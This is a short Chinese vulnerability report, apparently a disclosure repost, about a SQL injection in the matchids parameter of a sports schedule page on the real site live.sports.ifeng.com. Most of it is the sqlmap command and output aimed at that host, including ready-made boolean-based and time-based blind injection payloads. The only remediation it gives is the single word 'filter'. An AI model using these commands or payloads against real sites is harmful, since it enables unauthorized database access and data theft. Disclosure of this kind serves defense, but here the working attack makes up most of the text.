凤凰网体育直播间一处SQL注入下载

凤凰网体育直播间一处SQL注入

sqlmap.py -u "http://live.sports.ifeng.com/sports/schedule.php?format=js&matchids=“ 过滤不严导致注入。



G:\python\sqlmap>sqlmap.py -u "http://live.sports.ifeng.com/sports/schedule.php?

format=js&matchids="



sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org



[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program



[*] starting at 00:48:09



[00:48:09] [WARNING] using 'C:\Documents and Settings\mm\.sqlmap\output' as the

output directory

[00:48:09] [INFO] resuming back-end DBMS 'mysql'

[00:48:09] [INFO] testing connection to the target URL

sqlmap got a 302 redirect to 'http://www.ifeng.com'. Do you want to follow? [Y/n

] y

[00:48:14] [INFO] heuristics detected web page charset 'ISO-8859-2'

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: matchids

Type: boolean-based blind

Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)

Payload: format=js&matchids=-5547 OR (5410=5410)#



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 OR time-based blind

Payload: format=js&matchids=-5830 OR 5843=SLEEP(5)

---

[00:48:20] [INFO] the back-end DBMS is MySQL

web application technology: Nginx

back-end DBMS: MySQL 5.0.11

sqlmap.py -u "http://live.sports.ifeng.com/sports/schedule.php?format=js&matchids=“



Place: GET

Parameter: matchids

Type: boolean-based blind

Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)

Payload: format=js&matchids=-5547 OR (5410=5410)#



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 OR time-based blind

Payload: format=js&matchids=-5830 OR 5843=SLEEP(5)

---

修复方案:

过滤。

当前位置:站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细